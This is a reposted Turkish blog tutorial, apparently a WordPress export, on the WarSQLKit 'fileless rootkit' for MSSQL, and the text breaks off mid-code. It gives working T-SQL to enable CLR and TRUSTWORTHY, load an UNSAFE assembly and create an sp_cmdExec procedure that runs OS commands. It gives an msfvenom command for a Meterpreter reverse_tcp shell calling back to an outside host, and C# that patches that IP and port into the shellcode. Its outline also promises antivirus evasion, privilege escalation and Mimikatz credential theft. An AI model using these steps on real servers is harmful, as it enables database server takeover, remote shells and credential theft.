{"id":296,"date":"2024-08-14T12:05:03","date_gmt":"2024-08-14T04:05:03","guid":{"rendered":"https:\/\/yudi001.cn\/?p=296"},"modified":"2024-08-14T12:05:03","modified_gmt":"2024-08-14T04:05:03","slug":"mssql-%e6%97%a0%e6%96%87%e4%bb%b6-rootkit-mssql-%e6%94%bb%e5%87%bb%e5%b7%a5%e5%85%b7-warsqlkit","status":"publish","type":"post","link":"http:\/\/www.yudi001.cn\/wordpress\/?p=296","title":{"rendered":"MSSQL \u65e0\u6587\u4ef6 Rootkit \u2013 MSSQL \u653b\u51fb\u5de5\u5177 \u2013 WarSQLKit"},"content":{"rendered":"\n

\u8f6c\u81ea:https:\/\/eyupcelik.com.tr\/mssql-fileless-rootkit-warsqlkit\/<\/a><\/p>\n\n\n\n

MSSQL Fileless Rootkit \u2013 MSSQL Attack Tool \u2013 WarSQLKit<\/p>\n\n\n\n

Giri\u015f<\/h3>\n\n\n\n

Bu yaz\u0131mda uzun zamand\u0131r u\u011fra\u015ft\u0131\u011f\u0131m bir konuyu ele alaca\u011f\u0131m: MSSQL Rootkit. \u015eimdiye kadar MS-SQL i\u00e7in anlat\u0131lan post-exploitation i\u015flemlerinin b\u00fcy\u00fck \u00e7o\u011funlu\u011fu \u201cxp_cmdshell<\/strong>\u201d ve \u201csp_OACreate<\/strong>\u201d stored procedure\u2019leri kullanarak anlat\u0131l\u0131r. Peki xp_cmdshell ve sp_OACreate stored procedure\u2019lerinin olmad\u0131\u011f\u0131 bir MSSQL sunucusunun \u201csa<\/strong>\u201d hesab\u0131n\u0131 yada \u201csysadmin<\/strong>\u201d haklar\u0131na sahip herhangi bir kullan\u0131c\u0131 hesab\u0131n\u0131 ele ge\u00e7irmi\u015fsek, o sisteme girmekten vaz m\u0131 ge\u00e7ece\u011fiz?<\/p>\n\n\n\n

Tabii ki vazge\u00e7mememiz gerekiyor. Bu makale \u201csysadmin<\/strong>\u201d haklar\u0131na sahip bir hesab\u0131n\u0131n yakaland\u0131\u011f\u0131 ve \u201cxp_cmdshel<\/strong>l\u201d, \u201csp_OACreate<\/strong>\u201d, \u201csp_OAMethod<\/strong>\u201d vb. prosed\u00fcrlerin hi\u00e7birinin \u00e7al\u0131\u015fmad\u0131\u011f\u0131 bir senaryo d\u00fc\u015f\u00fcn\u00fclerek kaleme al\u0131nm\u0131\u015ft\u0131r.<\/p>\n\n\n\n

WarSQLKit Github: https:\/\/github.com\/mindspoof\/MSSQL-Fileless-Rootkit-WarSQLKit<\/a><\/p>\n\n\n\n

WarSQLKit.dll: https:\/\/github.com\/mindspoof\/MSSQL-Fileless-Rootkit-WarSQLKit\/raw\/master\/WarSQLKit\/bin\/Debug\/WarSQLKit.dll<\/a><\/p>\n\n\n\n

WarSQLKit_Compressed.dll: https:\/\/github.com\/mindspoof\/MSSQL-Fileless-Rootkit-WarSQLKit\/raw\/master\/WarSQLKit\/bin\/Debug\/Confused\/WarSQLKit.dll<\/a><\/p>\n\n\n\n

WarSQLKitMinimal.dll: https:\/\/github.com\/mindspoof\/MSSQL-Fileless-Rootkit-WarSQLKit\/raw\/master\/WarSQLKitMinimal\/bin\/Debug\/W<\/a>a<\/a>rSQLKitMinimal.dll<\/a><\/p>\n\n\n\n

Meterpreter CSharp (C#) Shellcode: https:\/\/github.com\/mindspoof\/Build-Meterpreter-CSharp-Shellcode<\/a><\/p>\n\n\n\n

Meterpreter CSharp (C#) Base64 Encoded Shellcode: https:\/\/github.com\/mindspoof\/Build-Encoded-Meterpreter-C-Shellcode<\/a><\/p>\n\n\n\n

Ba\u015fl\u0131ca konular\u0131m\u0131z a\u015fa\u011f\u0131daki ba\u015fl\u0131klardan olu\u015facakt\u0131r.<\/p>\n\n\n\n

    \n
  1. CLR Nedir?<\/li>\n\n\n\n
  2. CLR Tabanl\u0131 DLL Nedir?<\/li>\n\n\n\n
  3. CLR Tabanl\u0131 DLL Olu\u015fturma<\/li>\n\n\n\n
  4. DLL Komut \u0130\u015fleyicisi<\/li>\n\n\n\n
  5. Assemblies \u2013 Stored Procedures \u2013 TRUSTWORTHY\u00a0 \u0130li\u015fkisi\n
      \n
    1. DLL Dosyas\u0131n\u0131 Byte Stream Olarak MSSQL\u2019e Y\u00fckleme<\/li>\n\n\n\n
    2. DLL Dosyas\u0131n\u0131 SQL Server Management Studio ile MSSQL\u2019e Y\u00fckleme<\/li>\n\n\n\n
    3. DLL Dosyas\u0131n\u0131 Sunucudaki Bir Dizinden \u00c7a\u011f\u0131rma<\/li>\n<\/ol>\n<\/li>\n\n\n\n
    4. Windows Komutlar\u0131 \u00c7al\u0131\u015ft\u0131rma<\/li>\n\n\n\n
    5. C# \u2013 MSSQL Uyumlu Meterpreter ShellCode<\/li>\n\n\n\n
    6. .NET Framework\u2019den Faydalanarak (Visual Studio Olmadan) MSSQL \u00dczerinden C# Kodu Derleme<\/li>\n\n\n\n
    7. Meterpreter Shellcode\u2019unu Anti-Vir\u00fcslerden Saklama Tekni\u011fi<\/li>\n\n\n\n
    8. RottenPotato (Kumpir.exe) \u00dczerinden Hak ve Yetki Y\u00fckseltme<\/li>\n\n\n\n
    9. Mimikatz ile Oturum Bilgilerini Elde Etme<\/li>\n\n\n\n
    10. File Downloader<\/li>\n\n\n\n
    11. WarSQLKit.dll (MSSQL Fileless Rootkit) Kullan\u0131m Rehberi\n
        \n
      1. WarSQLKitMinimal.dll (MSSQL Fileless Rootkit) Kullan\u0131m Rehberi<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n\n\n\n

        1. CLR<\/h3>\n\n\n\n

        CLR (Common Language Runtime \u2013 Ortak Dil \u00c7al\u0131\u015fma Zaman\u0131) MSSQL Server 2005 ile hayat\u0131m\u0131za giren ve MSSQL Server 2016\u2019da da mevcut olan, .NET Framework\u2019\u00fcn kod y\u00fcr\u00fctme ortam\u0131n\u0131 sa\u011flar. Yani MSSQL \u00fczerinden .NET Framework objelerini i\u015fleyip, \u00e7al\u0131\u015ft\u0131rmam\u0131z\u0131 sa\u011flar. MSSQL CLR ile herhangi bir .NET DLL\u2019ini i\u00e7eri aktarma ya da T-SQL ile kod \u00e7al\u0131\u015ft\u0131rma i\u015flemlerini ger\u00e7ekle\u015ftirebiliriz.<\/p>\n\n\n\n

        2. CLR Tabanl\u0131 DLL Nedir?<\/h3>\n\n\n\n

        CLR Tabanl\u0131 DLL; MSSQL i\u00e7in C#, VB.NET vb. .NET dillerinden birini kullanarak sakl\u0131 yordamlar (stored procedure), tetikleyiciler (triggers) vb. T-SQL c\u00fcmlelerinin .NET \u00e7at\u0131s\u0131 \u00fczerinden \u00e7al\u0131\u015ft\u0131r\u0131lmas\u0131n\u0131 sa\u011flar. CLR tabanl\u0131 olu\u015fturaca\u011f\u0131m\u0131z bir DLL ile, MSSQL\u2019den DLL dosyas\u0131na stored procedure ya da benzeri T-SQL c\u00fcmleleri g\u00f6ndererek, bu c\u00fcmlelerin \u00e7al\u0131\u015fmas\u0131n\u0131 sa\u011flayabiliriz. Benim i\u00e7in ampullerin yand\u0131\u011f\u0131 yer de tam olarak buras\u0131 oldu. \u015e\u00f6yle d\u00fc\u015f\u00fcnd\u00fcm, ben e\u011fer MSSQL \u00fczerinden herhangi bir .NET objesi \u00e7al\u0131\u015ft\u0131rabiliyorsam, o zaman istedi\u011fim herhangi bir kodu i\u015fletim sisteminde de \u00e7al\u0131\u015ft\u0131rabilirim. Hatta biraz daha ileri giderek, .NET\u2019in t\u00fcm g\u00fcc\u00fcn\u00fc kullanabilir ve kendi Rootkit\u2019imi olu\u015fturabilirim. Peki nas\u0131l yapaca\u011f\u0131z?<\/p>\n\n\n\n

        3. CLR Tabanl\u0131 DLL Olu\u015fturma<\/h3>\n\n\n\n

        \u00d6ncelikle Visual Studio\u2019dan bir proje olu\u015fturaca\u011f\u0131z. New Project > SQL Server > SQL Server Database Project ad\u0131m\u0131n\u0131 izliyoruz.<\/p>\n\n\n\n

        \"\"
        1_Create_project<\/figcaption><\/figure>\n\n\n\n

        Projemizi olu\u015fturduktan sonra sa\u011f t\u0131klay\u0131p Add > New Item > SQL CLR C# > SQL CLR C# Stored Procedure ad\u0131m\u0131n\u0131 takip ediyoruz.<\/p>\n\n\n\n

        \"\"
        2_CLR_Stored_Procedure<\/figcaption><\/figure>\n\n\n\n

        Bu ad\u0131mlardan sonra art\u0131k CLR tabanl\u0131 DLL dosyam\u0131z haz\u0131r durumdad\u0131r. Art\u0131k kodlamaya ba\u015flayabiliriz.<\/p>\n\n\n\n

        4. DLL Komut \u0130\u015fleyicisi<\/h3>\n\n\n\n

        Stored Procedure\u2019\u00fcm\u00fczden DLL\u2019e g\u00f6nderilecek komutlar\u0131 i\u015fleyecek bir metod yazmam\u0131z gerekiyor. Bunu olu\u015fturmam\u0131z\u0131n sebebi MSSQL \u00fczerinden iletilen i\u015fletim sistemi komutlar\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rmam\u0131z gerekmesindendir.<\/p>\n\n\n\n

        \"\"
        3_clr_cmd<\/figcaption><\/figure>\n\n\n\n

        \u201cCmdExec<\/strong>\u201d ad\u0131nda ve \u201ccmd<\/strong>\u201d parametresine sahip bir static metot tan\u0131mlad\u0131m. Bu static metoda gelen komutlar \u201cRunCommand<\/strong>\u201d static metoduna iletiliyor. B\u00f6ylece input olarak g\u00f6nderilen komutu parametreleri ile birlikte bir process \u00fczerinden \u00e7al\u0131\u015ft\u0131r\u0131p, sonu\u00e7lar\u0131 d\u00f6nd\u00fcrebilece\u011fiz.<\/p>\n\n\n\n

        \"\"
        4_run_command<\/figcaption><\/figure>\n\n\n\n

        RunCommand metoduna g\u00f6nderilen komutlar ile Process()<\/strong> s\u0131n\u0131f\u0131ndan bir process olu\u015fturup, cmd.exe \u00fczerinden \u00e7al\u0131\u015fmas\u0131n\u0131 ve \u00e7\u0131kt\u0131n\u0131n bize MSSQL \u00fczerinden geri d\u00f6nd\u00fcr\u00fclmesini sa\u011fl\u0131yoruz.<\/p>\n\n\n\n

        5. Assemblies \u2013 Stored Procedures \u2013 TRUSTWORTHY  \u0130li\u015fkisi<\/h3>\n\n\n\n

        SQL CLR C# Stored Procedure kullanarak .NET DLL\u2019imizin basic halini olu\u015fturduk. Ancak bu dll tek ba\u015f\u0131na i\u015fimize yaramayacakt\u0131r. DLL\u2019i MSSQL\u2019e kay\u0131t ettirerek stored procedure\u2019\u00fcm\u00fcz\u00fc olu\u015fturacak T-SQL\u2019e ihtiyac\u0131m\u0131z var. MSSQL \u00fczerinden CLR tabanl\u0131 DLL dosyalar\u0131n olu\u015fturulmas\u0131na ve \u00e7al\u0131\u015ft\u0131r\u0131lmas\u0131na izin vermemiz gerekiyor. MSSQL Server 2016 varsay\u0131landa CLR tabanl\u0131 DLL dosyalar\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rmaz, disable olarak gelir. Bu ayar\u0131 de\u011fi\u015ftirmek i\u00e7in a\u015fa\u011f\u0131daki koddan yararlan\u0131yoruz.<\/p>\n\n\n\n

        sp_configure 'clr enabled', 1\nGO\nRECONFIGURE\nGO<\/code><\/pre>\n\n\n\n
        Yukar\u0131daki kod ile \u201cclr enabled<\/strong>\u201d parametresini aktif hale getiriyoruz. Bu i\u015flemin ard\u0131ndan DLL dosyalar\u0131m\u0131z Assemblies olarak MSSQL\u2019e eklenebilir.<\/p>\n\n\n\n
        TRUSTWORTHY; MSSQL veritaban\u0131nda yer alan veritabanlar\u0131n\u0131n g\u00fcvenli olarak i\u015faretlenmesini sa\u011flar. G\u00fcvenli olarak i\u015faretlenmi\u015f veritabanlar\u0131 objelere, a\u011f ve i\u015flem kaynaklar\u0131na eri\u015febilir. Trustworthy ile veritaban\u0131n\u0131 g\u00fcvenli olarak i\u015faretlemek i\u00e7in a\u015fa\u011f\u0131daki kodu kullanabiliriz.<\/p>\n\n\n\n
        ALTER DATABASE master SET TRUSTWORTHY ON;<\/code><\/pre>\n\n\n\n
        Bu i\u015fleminde ard\u0131ndan haz\u0131rlad\u0131\u011f\u0131m\u0131z DLL dosyas\u0131n\u0131 MSSQL\u2019e Assemblies olarak tan\u0131tmam\u0131z gerekecek. \u0130\u015fin en g\u00fczel taraf\u0131 buras\u0131 diyebilirim. MSSQL\u2019de Assemblies (.NET DLL) tan\u0131mlaman\u0131n 3 farkl\u0131 y\u00f6ntemi mevcut. Yani olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 3 farkl\u0131 y\u00f6ntem kullanarak veritaban\u0131na y\u00fckleyebiliriz.<\/p>\n\n\n\n
        a. DLL Dosyas\u0131n\u0131 Byte Stream Olarak MSSQL\u2019e Y\u00fckleme<\/h3>\n\n\n\n
        Olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 MSSQL\u2019e bir Byte Stream halinde y\u00fckleyebiliriz. Bunun i\u00e7in ayr\u0131 bir projede olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 File.ReadAllBytes() s\u0131n\u0131f\u0131 ile \u00e7a\u011f\u0131rmam\u0131z gerekiyor.<\/p>\n\n\n\n
        \"\"
        5_byteStream<\/figcaption><\/figure>\n\n\n\n
        Ayr\u0131 bir projede olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 byte Stream t\u00fcr\u00fcnden okuyarak byteStream.txt dosyas\u0131na yazd\u0131rd\u0131m. Art\u0131k elimizde DLL dosyas\u0131n\u0131n byte Stream\u2019i mevcut. MSSQL\u2019e herhangi bir DLL y\u00fcklemeden bu byte Stream ile Assemblies\u2019e DLL dosyam\u0131z\u0131 kaydettirebilece\u011fiz. Bunun i\u00e7in birka\u00e7 SQL koduna ihtiyac\u0131m\u0131z olacakt\u0131r.<\/p>\n\n\n\n
        Not: Bu y\u00f6ntem ile MSSQL\u2019de herhangi bir DLL dosyas\u0131 olu\u015fturmadan sadece Stream olarak DLL dosyam\u0131z\u0131 tutaca\u011f\u0131z. B\u00f6ylece Rootkit\u2019imiz tamamen fileless olacakt\u0131r.<\/p>\n\n\n\n
        CREATE ASSEMBLY sp_cmdExec\nFROM 0x4D5A90000300000004000000FFFF0000B800000000000\nWITH PERMISSION_SET = UNSAFE\nGO<\/code><\/pre>\n\n\n\n
        CREATE ASSEMBLY komutu ile \u201csp_cmdExec<\/strong>\u201d ad\u0131nda bir Assemblies olu\u015fturuyoruz. Ard\u0131ndan FROM komutu ile dosyaya yazd\u0131rd\u0131\u011f\u0131m\u0131z byte Stream\u2019i se\u00e7ece\u011fiz. Burada dikkat etmemiz gereken en \u00f6nemli nokta \u015fudur; text dosyas\u0131na yazd\u0131rd\u0131\u011f\u0131m\u0131z byte Stream\u2019in ba\u015f\u0131nda \u201c0x<\/strong>\u201d bulunmamaktad\u0131r. Text dosyam\u0131zdaki stream\u2019i yap\u0131\u015ft\u0131rd\u0131\u011f\u0131m\u0131zda \u00e7al\u0131\u015fmayacakt\u0131r. Bu y\u00fczden 0x\u2019i yazd\u0131ktan sonra text dosyam\u0131zdaki byte stream\u2019i yap\u0131\u015ft\u0131r\u0131yoruz. WITH PERMISSION_SET = UNSAFE<\/strong> parametresi ile de DLL dosyam\u0131z\u0131n g\u00fcvenli olmayan kaynaklara eri\u015fmesini (yani sadece sql, t-sql kodlar\u0131 \u00e7al\u0131\u015ft\u0131rmayaca\u011f\u0131m\u0131z\u0131) belirtiyoruz. E\u011fer parametre olarak SAFE parametresini verirsek ve CMD komutu \u00e7al\u0131\u015ft\u0131rmaya \u00e7al\u0131\u015f\u0131rsak, \u201cSystem.Security.HostProtectionException<\/strong>\u201d hatas\u0131 f\u0131rlat\u0131lacak ve cmd komutumuz hi\u00e7bir zaman \u00e7al\u0131\u015fmayacakt\u0131r.<\/p>\n\n\n\n
        \"\"
        clr<\/figcaption><\/figure>\n\n\n\n
        Yukar\u0131daki resimde g\u00f6r\u00fclece\u011fi \u00fczere, SAFE sadece database \u00fczerinde i\u015flem yapt\u0131rmaktad\u0131r. EXTERNAL_ACCESS Dosyalara, Registry\u2019e ve Network\u2019e eri\u015fmemize olanak verir. UNSAFE ise Native DLL\u2019lere, COM objelerine ve di\u011fer g\u00fcvenli olmayan kaynaklara eri\u015fmemize imkan verir.<\/p>\n\n\n\n
        b. DLL Dosyas\u0131n\u0131 SQL Server Management Studio ile MSSQL\u2019e Y\u00fckleme<\/h3>\n\n\n\n
        Olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 SQL Server Management Studio \u00fczerinden de MSSQL\u2019e kaydettirebiliriz. Bunun i\u00e7in MSSQL\u2019e management studio arac\u0131l\u0131\u011f\u0131 ile ba\u011flanal\u0131m.<\/p>\n\n\n\n
        \"\"
        6_save_assemblies<\/figcaption><\/figure>\n\n\n\n
        Databases alt\u0131ndan System Databases\u2019e ve Master\u2019a eri\u015felim. Ard\u0131ndan Programmability men\u00fcs\u00fcnden Assemblies\u2019e sa\u011f t\u0131klayarak \u201cNew Assembly\u2026\u201di se\u00e7elim.<\/p>\n\n\n\n
        \"\"
        7_select_assemblies<\/figcaption><\/figure>\n\n\n\n
        Browse men\u00fcs\u00fcnden olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131 se\u00e7erek DLL\u2019imizi kaydettirebiliriz. Bu i\u015flemin ard\u0131ndan Assemblies men\u00fcs\u00fcne DLL dosyam\u0131z\u0131n eklendi\u011fini g\u00f6rmemiz gerekiyor.<\/p>\n\n\n\n
        \"\"
        8_save_assemblies<\/figcaption><\/figure>\n\n\n\n
        Yukar\u0131daki ekran g\u00f6r\u00fcnt\u00fcs\u00fcnde g\u00f6r\u00fclece\u011fi \u00fczere \u201cWarSQLKit\u201d ad\u0131ndaki DLL dosyam\u0131z Assemblies\u2019e kaydedildi.<\/p>\n\n\n\n
        c. DLL Dosyas\u0131n\u0131 Sunucudaki Bir Dizinden \u00c7a\u011f\u0131rma<\/h3>\n\n\n\n
        DLL dosyam\u0131z\u0131 Assemblies\u2019e kaydettirmemizin bir di\u011fer yolu da sunucudaki herhangi bir dizinden DLL\u2019i load etmemizdir. Bunun i\u00e7in de a\u015fa\u011f\u0131daki komutlardan yararlanabiliriz.<\/p>\n\n\n\n
        CREATE ASSEMBLY sp_cmdExec\nFROM 'C:\\ProgramData\\WarSQLKit.dll'\nWITH PERMISSION_SET = UNSAFE\nGO<\/code><\/pre>\n\n\n\n
        DLL dosyam\u0131z\u0131 herhangi bir y\u00f6ntem ile MSSQL sunucusuna y\u00fcklediysek, DLL dosyam\u0131z\u0131 bir dizinden de \u00e7a\u011f\u0131rabiliriz. \u00c7a\u011f\u0131rd\u0131\u011f\u0131m\u0131z DLL dosyas\u0131 load olduktan sonra, sunucudan silebiliriz. DLL dosyas\u0131n\u0131 sunucudan sildi\u011fimizde bile Assemblies\u2019imiz yine \u00e7al\u0131\u015fmas\u0131na devam edecektir. \u00c7ok g\u00fczel de\u011fil mi?<\/p>\n\n\n\n
        3 y\u00f6ntemden herhangi birini kullanarak DLL dosyam\u0131z\u0131 Assemblies\u2019e kaydettikten sonra, DLL dosyam\u0131zda olu\u015fturdu\u011fumuz CmdExec static metodunu \u00e7a\u011f\u0131rmam\u0131z ya da i\u015flem \u00e7a\u011fr\u0131s\u0131 g\u00f6ndermemiz gerekiyor. Bunu yapabilmek i\u00e7in son olarak bir stored procedure\u2019e ihtiyac\u0131m\u0131z var. A\u015fa\u011f\u0131daki komutlar ile stored procedure\u2019\u00fcm\u00fcz\u00fc olu\u015fturabiliriz.<\/p>\n\n\n\n
        CREATE PROCEDURE sp_cmdExec\n@Command [nvarchar](4000)\nWITH EXECUTE AS CALLER\nAS\nEXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec\nGO<\/code><\/pre>\n\n\n\n
        Yukar\u0131daki kodlar\u0131m\u0131z\u0131 detayland\u0131racak olursak, CREATE PROCEDURE \u201csp_cmdExec<\/strong>\u201d komutu ile sp_cmdExec ad\u0131nda bir stored procedure olu\u015fturuyoruz. Art\u0131k \u201cxp_cmdshell<\/strong>\u201d yerine \u201csp_cmdExec\u201d komutunu kullanaca\u011f\u0131z. @Command [nvarchar] (4000) ile de komut parametremizi tan\u0131ml\u0131yoruz. Nvarchar maksimum 4000 karaktere destek verdi\u011fi i\u00e7in 4000 karakterlik komut \u00e7al\u0131\u015ft\u0131rabilir ya da g\u00f6r\u00fcnt\u00fcleyebiliriz. EXTERNAL NAME parametresi ile olu\u015fturdu\u011fumuz DLL dosyas\u0131n\u0131n namespace\u2019i olan WarSQLKit\u2019i, bu namespace i\u00e7erisinde yer alan StoredProcedures isimli public partial class\u2019\u0131m\u0131z\u0131 ve CmdExec isimli public static void t\u00fcr\u00fcndeki metodumuzu \u00e7a\u011f\u0131r\u0131yoruz.<\/p>\n\n\n\n
        Art\u0131k her \u015feyimiz haz\u0131r, gidip komutlar\u0131m\u0131z\u0131 \u00e7al\u0131\u015ft\u0131ral\u0131m.<\/p>\n\n\n\n
        6. Windows Komutlar\u0131 \u00c7al\u0131\u015ft\u0131rma<\/h3>\n\n\n\n
        \"\"
        9_cmdexec<\/figcaption><\/figure>\n\n\n\n
        EXEC sp_cmdExec \u2018net user\u2019; komutu ile Windows Yerel Kullan\u0131c\u0131 listesini ekrana getirdik. Art\u0131k xp_cmdshell ve sp_OACrate gibi bir procedure\u2019e ihtiyac\u0131m\u0131z bulunmuyor. Bildi\u011fimiz t\u00fcm Windows komutlar\u0131n\u0131 i\u015fletim sistemine g\u00f6nderebiliriz.<\/p>\n\n\n\n
        7. C# \u2013 MSSQL Uyumlu Meterpreter ShellCode<\/h3>\n\n\n\n
        Buraya kadar temel xp_cmdshell\u2019den pek farkl\u0131 bir \u015fey yapmad\u0131k. Rootkit\u2019imizi rootkit yapan k\u0131s\u0131mlara \u015fimdi ge\u00e7ebiliriz. Hat\u0131rlarsan\u0131z, .NET Framework\u2019\u00fcn g\u00fcc\u00fcn\u00fc MSSQL\u2019de kullanabilece\u011fimizden bahsetmi\u015ftim. O halde DLL dosyam\u0131z\u0131 biraz daha modifiye ederek, i\u00e7erisine Meterpreter Shellcode\u2019unu g\u00f6melim. B\u00f6ylece sp_cmdExec stored procedure\u2019\u00fcm\u00fcze tan\u0131mlayaca\u011f\u0131m\u0131z bir parametre ile Meterpreter oturumu elde edebiliriz.<\/p>\n\n\n\n
        Daha \u00f6nce okumayanlar i\u00e7in temel msfvenom kullan\u0131m\u0131na bu adresten eri\u015febilirsiniz.<\/p>\n\n\n\n
        \nhttps:\/\/eyupcelik.com.tr\/derinlemesine-msfvenom-kullanimi\/embed\/#?secret=h4DFMZjLzo#?secret=O4ZQzZWms6\n<\/div><\/figure>\n\n\n\n
        Kali i\u015fletim sistemimizden terminal ekran\u0131na eri\u015ferek msfvenom \u00fczerinden csharp uyumlu shellcode olu\u015ftural\u0131m. Bunun i\u00e7in a\u015fa\u011f\u0131daki komutlardan yararlanabiliriz.<\/p>\n\n\n\n
        msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.139.129 LPORT=4444 EXITFUNC=none -f csharp --platform windows<\/code><\/pre>\n\n\n\n
        \"\"
        10_msfvenom_csharp<\/figcaption><\/figure>\n\n\n\n
        Olu\u015fturdu\u011fumuz shellcode 323 byte\u2019l\u0131k bir kod olacakt\u0131r. Olu\u015fturdu\u011fumuz shellcode\u2019u csharp uyumlu olarak olu\u015fturduk. Meterpreter kodlar\u0131n\u0131 derlemek ve \u00e7al\u0131\u015ft\u0131rmak i\u00e7in DLL dosyam\u0131za yeni bir class eklememiz gerekiyor. Ben MeterpreterBuilder ad\u0131nda bir class olu\u015fturdum. Olu\u015fturdu\u011fum bu class\u2019a public void t\u00fcr\u00fcnde ve SaveReverseMeterpreter() ad\u0131nda bir metot tan\u0131ml\u0131yoruz. Bu metoda shellcode\u2019u \u00e7al\u0131\u015ft\u0131racak gereksinimleri tan\u0131ml\u0131yoruz.<\/p>\n\n\n\n
        \"\"
        11_shellcode_csharp<\/figcaption><\/figure>\n\n\n\n
        Bu i\u015flemin ard\u0131ndan MeterpreterBuilder class\u0131m\u0131z\u0131n globaline a\u015fa\u011f\u0131daki parametreleri tan\u0131ml\u0131yoruz.<\/p>\n\n\n\n
        \"\"
        12_shellcode_csharp<\/figcaption><\/figure>\n\n\n\n
        Shellcode\u2019umuzu \u00e7al\u0131\u015ft\u0131racak class\u2019\u0131m\u0131z haz\u0131r. Direkt olarak sp_cmdExec \u00fczerinden \u00e7al\u0131\u015ft\u0131rmak istedi\u011fimizde kar\u015f\u0131m\u0131za 2 problem \u00e7\u0131kacakt\u0131r. 1. MSSQL (sqlservr.exe) bu shellcode\u2019u \u00e7al\u0131\u015ft\u0131rmam\u0131za izin vermeyecektir. 2. Her seferinde msfvenom\u2019dan csharp shellcode\u2019u \u00fcretip, DLL\u2019imizi g\u00fcncellememiz de bize b\u00fcy\u00fck bir y\u00fck \u00e7\u0131karacakt\u0131r. Bu y\u00fczden \u00f6ncelikle bu problemleri \u00e7\u00f6zmemiz gerekiyor.<\/p>\n\n\n\n
        Shellcode\u2019u \u00e7al\u0131\u015ft\u0131rmak i\u00e7in .NET Framework\u2019\u00fcn dahili derleyicisini kullanarak (Visual Studio\u2019ya ihtiya\u00e7 olmadan) kodumuzu exe olarak build ederek ayr\u0131 bir process olarak \u00e7al\u0131\u015ft\u0131rmam\u0131z gerekiyor. Her seferinde msfvenom ve shellcode ile u\u011fra\u015famayaca\u011f\u0131m\u0131z i\u00e7in, SaveReverseMeterpreter() metodumuza string ip ve string port \u015feklinde parametre tan\u0131mlayarak, stored procedure\u2019\u00fcm\u00fczden gelecek IP-port parametresi ile shellcode\u2019umuzu g\u00fcncelleyerek, derlememiz gerekiyor. 1. Ad\u0131m i\u00e7in \u201c.NET Framework\u2019den Faydalanarak (Visual Studio Olmadan) MSSQL \u00dczerinden C# Kodu Derleme\u201d ba\u015fl\u0131kl\u0131 b\u00f6l\u00fcm\u00fc okuyabilirsiniz. 2. ad\u0131mda metodumuzu public static void SaveReverseMeterpreter(string ip, string port) \u015feklinde g\u00fcncelliyoruz. Art\u0131k SaveReverseMeterpreter metodu \u00e7a\u011fr\u0131ld\u0131\u011f\u0131nda bir IP ve port girmemizi isteyecektir. Girilen IP ve port bilgisine g\u00f6re de shellcode\u2019umuzu g\u00fcncelleyece\u011fiz. Bunun i\u00e7in a\u015fa\u011f\u0131daki kodlardan faydalanabiliriz.<\/p>\n\n\n\n
        var ipOctetSplit = ip.Split('.');\nbyte octByte1 = Convert.ToByte(ipOctetSplit[0]);\nbyte octByte2 = Convert.ToByte(ipOctetSplit[1]);\nbyte octByte3 = Convert.ToByte(ipOctetSplit[2]);\nbyte octByte4 = Convert.ToByte(ipOctetSplit[3]);\nint inputPort = Int32.Parse(port);<\/code><\/pre>\n\n\n\n
        Parametre olarak g\u00f6nderilen IP\u2019yi \u201c.\u201d ya g\u00f6re split ediyoruz. B\u00f6ylece IP 4 octet\u2019e ayr\u0131lm\u0131\u015f olacakt\u0131r. Her octet i\u00e7in byte t\u00fcr\u00fcnde bir de\u011fi\u015fken tan\u0131mlayarak, Convert.ToByte ile de string olarak gelen IP octetlerini byte t\u00fcr\u00fcne \u00e7eviriyoruz. Ayn\u0131 i\u015flemi port i\u00e7in de yap\u0131yoruz.<\/p>\n\n\n\n
        Port i\u00e7in yapt\u0131\u011f\u0131m\u0131z i\u015flem biraz daha farkl\u0131 oldu. Port\u2019u Int32 t\u00fcr\u00fcne parse ettik. Bunun sebebi \u015fudur; port sadece rakamdan olu\u015fmaktad\u0131r. Arada bir noktalama i\u015fareti bulunmamaktad\u0131r. Ayr\u0131ca port 256\u2019dan b\u00fcy\u00fck bir rakama denk gelebilir. Yani port 4444 olarak tan\u0131mland\u0131ysa 256\u2019dan b\u00fcy\u00fck oldu\u011fu i\u00e7in Meterpreter shellcode\u2019da 2 byte\u2019l\u0131k bir de\u011fere sahip olacakt\u0131r. Biz portun hangi say\u0131 ile set edilece\u011fini bilmedi\u011fimiz i\u00e7in, port numaras\u0131n\u0131n b\u00fcy\u00fckl\u00fc\u011f\u00fcne bakarak, hangi byte\u2019\u0131 set etmemiz gerekti\u011fine karar verece\u011fiz.<\/p>\n\n\n\n
        byte port1Byte = 0x00;\nbyte port2Byte = 0x00;<\/code><\/pre>\n\n\n\n
        0x00 de\u011ferine sahip, byte t\u00fcr\u00fcnden 2 adet de\u011fi\u015fken tan\u0131mlad\u0131m.<\/p>\n\n\n\n
        if (inputPort > 256)\n                {\n                    int portOct1 = inputPort \/ 256;\n                    int portOct2 = portOct1 * 256;\n                    int portOct3 = inputPort - portOct2;\n                    int portoct1Calc = portOct1 * 256 + portOct3;\n                    if (inputPort == portoct1Calc)\n                    {\n                        port1Byte = Convert.ToByte(portOct1);\n                        port2Byte = Convert.ToByte(portOct3);\n                    }\n                }\n                else\n                {\n                    port1Byte = 0x00;\n                    port2Byte = Convert.ToByte(inputPort);\n                }<\/code><\/pre>\n\n\n\n
